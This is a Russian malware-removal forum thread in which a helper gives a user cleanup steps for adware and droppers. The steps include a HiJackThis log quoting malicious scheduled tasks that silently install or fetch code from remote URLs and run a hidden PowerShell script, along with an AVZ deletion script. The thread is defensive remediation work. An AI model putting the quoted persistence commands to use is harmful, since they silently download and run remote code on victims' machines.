Постоянно всплывают различные окна с иероглифами, антивирус панда выявляет появляющиеся вредоносные объекты.
Курейт уничтожил 7 угроз, но окна с иероглифами продолжают всплывать.
Printable View
Постоянно всплывают различные окна с иероглифами, антивирус панда выявляет появляющиеся вредоносные объекты.
Курейт уничтожил 7 угроз, но окна с иероглифами продолжают всплывать.
Уважаемый(ая) [B]ivanof[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
1. Деинсталлируйте следующее ПО:
- браузер [B]UCBrowser[/B]
- [B]Traffic Exchange[/B] от компании Microleaves
Для удаления можно использовать программу [COLOR="#0000CD"]Revo Uninstaller[/COLOR], она у вас есть.
Revo Uninstaller по окончанию работы предложит зачистить остатки удаляемой программы. В качестве режима сканирования оставьте Умеренный и щелкните Далее. Если в процессе поиска будут найдены остатки программы, - нажмите Удалить, а потом Готово.
2. Пофиксите в [url=https://virusinfo.info/showthread.php?t=4491]HiJackThis[/url], если они там еще есть.
Сама программа HiJackThis находится в папке AutoLogger, в подпапке HiJackThis
[code]
O22 - Task (Ready): Grajsp - C:\WINDOWS\system32\msiexec.exe /i hTTp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST3500418AS_9VMT1087XXXX9VMT1087&d=20170406 /q
O22 - Task (Ready): KuaiZip_Update - C:\PROGRA~1\6A8C~1\X86\Update.exe
O22 - Task (Ready): Metuswotosy Module - C:\Program Files (x86)\Ategary\xbigiy.exe 55cd7530-f272-48aa-baa8-a5b864f445ed (file missing)
O22 - Task (Ready): Milimili - C:\Program Files (x86)\MIO\MIO.exe -bindurl http://api.suibianmaimaicom.com/st3500418as_9vmt1087xxxx9vmt1087.dat cmd=
O22 - Task (Ready): Traffic Exchange - C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe 1 11 (file missing)
O22 - Task (Ready): Traffic Exchange Guard - C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe 1 12 (file missing)
O22 - Task (Ready): Traffic Exchange Guardian - C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe 1 13 (file missing)
O22 - Task (Ready): Traffic Exchange Updater - C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe /silentall -nofreqcheck
O22 - Task (Ready): UCBrowserSecureUpdater - C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe --update-config
O22 - Task (Ready): UCBrowserUpdater - C:\Program Files (x86)\UCBrowser\Application\update_task.exe /update
O22 - Task (Ready): UCBrowserUpdaterCore - C:\Program Files (x86)\UCBrowser\Application\update_task.exe /task=1
O22 - Task (Ready): Windows-PG - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Update\psgo\psgo.ps1
O23 - Service R2: KuaizipUpdateChecker - C:\WINDOWS\SysWow64\svchost.exe; "ServiceDll" = C:\Program Files\їмС№\X86\kuaizipUpdateChecker.dll
O23 - Service R2: SNARER - C:\Windows\System32\svchost.exe; "ServiceDll" = C:\Users\Alex\AppData\Roaming\SNARER\Snarer.dll
O23 - Service R2: WinSAPSvc - C:\WINDOWS\SysWow64\svchost.exe; "ServiceDll" = C:\Users\Alex\AppData\Roaming\WinSAPSvc\WinSAP.dll
O23 - Service S2: Install Service(FirefoxDL) - (FirefoxDL) - C:\Users\Alex\AppData\Local\Temp\1\QQBrowser.exe
[/code]
3. Скачайте [url=http://virusinfo.info/soft/tool.php?tool=ClearLNK]ClearLNK[/url] и сохраните архив с утилитой на Рабочем столе.
* Распакуйте архив с утилитой в отдельную папку.
* Перенесите файл [b]Check_Browsers_LNK.log[/b] из логов на ClearLNK как показано на рисунке
[url=http://dragokas.com/tools/move.gif][img]http://dragokas.com/tools/move.gif[/img][/url]
* Отчет о работе [b]ClearLNK-<Дата>.log[/b] будет сохранен в папке LOG.
* Прикрепите этот отчет к своему следующему сообщению.
[COLOR="#FF0000"][B]4. Перезагрузите компьютер вручную.[/B][/COLOR]
5. [b]Временно отключите [url=https://virusinfo.info/showthread.php?t=130828]защитное ПО[/url][/b].
Выполните скрипт [url=https://virusinfo.info/showthread.php?t=7239]AVZ[/url].
Сама программа AVZ находится в папке AutoLogger, в подпапке AVZ.
[code]
begin
TerminateProcessByName('c:\program files (x86)\ucbrowser\application\ucbrowser.exe'); //ADS
StopService('UCBrowserSvc');
DeleteService('UCBrowserSvc');
StopService('ucdrv');
DeleteService('ucdrv');
StopService('KuaiZipDrive');
DeleteService('KuaiZipDrive');
QuarantineFileF('C:\Users\Alex\appdata\roaming\winsapsvc','*.exe,*.dll', false, '', 0, 0);
QuarantineFileF('C:\Update\psgo','*', false, '', 0, 0);
QuarantineFileF('C:\Program Files (x86)\MIO','*.exe,*.dll', false, '', 0, 0);
QuarantineFileF('C:\Program Files (x86)\Metuswotosy Module','*.exe,*.dll', false, '', 0, 0);
QuarantineFileF('C:\Users\Alex\AppData\Roaming\SNARER','*.exe,*.dll', false, '', 0, 0);
QuarantineFile('C:\Program Files\їмС№\X86','*.exe,*.dll', false, '', 0, 0);
QuarantineFile('C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys',''); //ADS
QuarantineFile('C:\WINDOWS\system32\drivers\KuaiZipDrive.sys','');
QuarantineFile('C:\WINDOWS\system32\drivers\cryptfd.sys','');
QuarantineFile('C:\WINDOWS\system32\drivers\7BC76FC1.sys','');
DelCLSID('{65122CB0-EA0F-47DF-A953-017170ED12F9}');
DeleteFile('C:\WINDOWS\system32\drivers\7BC76FC1.sys','32');
DeleteFile('C:\WINDOWS\system32\drivers\cryptfd.sys','32');
DeleteFile('C:\WINDOWS\system32\drivers\KuaiZipDrive.sys','32');
DeleteFile('C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys','32'); //ADS
DeleteFileMask('C:\Program Files\їмС№\X86','*',true);
DeleteDirectory('C:\Program Files\їмС№\X86');
DeleteFileMask('C:\Program Files\їмС№','*',true);
DeleteDirectory('C:\Program Files\їмС№');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\SNARER\Parameters','ServiceDll');
DeleteFileMask('C:\Users\Alex\AppData\Roaming\SNARER','*',true);
DeleteDirectory('C:\Users\Alex\AppData\Roaming\SNARER');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\WinSAPSvc\Parameters','ServiceDll');
DeleteFileMask('C:\Users\Alex\AppData\Roaming\WinSAPSvc','*',true);
DeleteDirectory('C:\Users\Alex\AppData\Roaming\WinSAPSvc');
DeleteFileMask('C:\Program Files (x86)\Metuswotosy Module','*',true);
DeleteDirectory('C:\Program Files (x86)\Metuswotosy Module');
ExecuteFile('schtasks.exe', '/delete /TN "Milimili" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Windows-PG" /F', 0, 15000, true);
DeleteFileMask('C:\Update\psgo','*',true);
DeleteDirectory('C:\Update\psgo');
DeleteFileMask('C:\Program Files (x86)\MIO','*',true);
DeleteDirectory('C:\Program Files (x86)\MIO');
DeleteFileMask('C:\Program Files (x86)\UCBrowser','*',true);
DeleteDirectory('C:\Program Files (x86)\UCBrowser');
DeleteFile('C:\WINDOWS\Tasks\UCBrowserUpdater.job','32');
DeleteFile('C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job','32');
ExecuteFile('schtasks.exe', '/delete /TN "UCBrowserUpdater" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "UCBrowserUpdaterCore" /F', 0, 15000, true);
ExecuteSysClean;
ExecuteWizard('TSW',2,3,true);
ExecuteWizard('SCU',2,2,true);
RebootWindows(true);
end.
[/code]
Компьютер перезагрузится.
Выполните скрипт [url=https://virusinfo.info/showthread.php?t=7239]AVZ[/url].
[code]
begin
CreateQurantineArchive(GetAVZDirectory +'quarantine.zip');
end.
[/code]
Пришлите архив карантина из папки AVZ в следующем сообщении.
6. Сделайте новые логи программой [url=https://virusinfo.info/content.php?r=136-pravila]Autologger[/url] и пришлите их.
7. Сделайте лог утилитой [url=https://virusinfo.info/showthread.php?t=146192]AdwCleaner[/url] и пришлите его.
8. Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
[img]http://i739.photobucket.com/albums/xx33/emeraldnzl/FRST%20Console%20with%2090days.jpg[/img]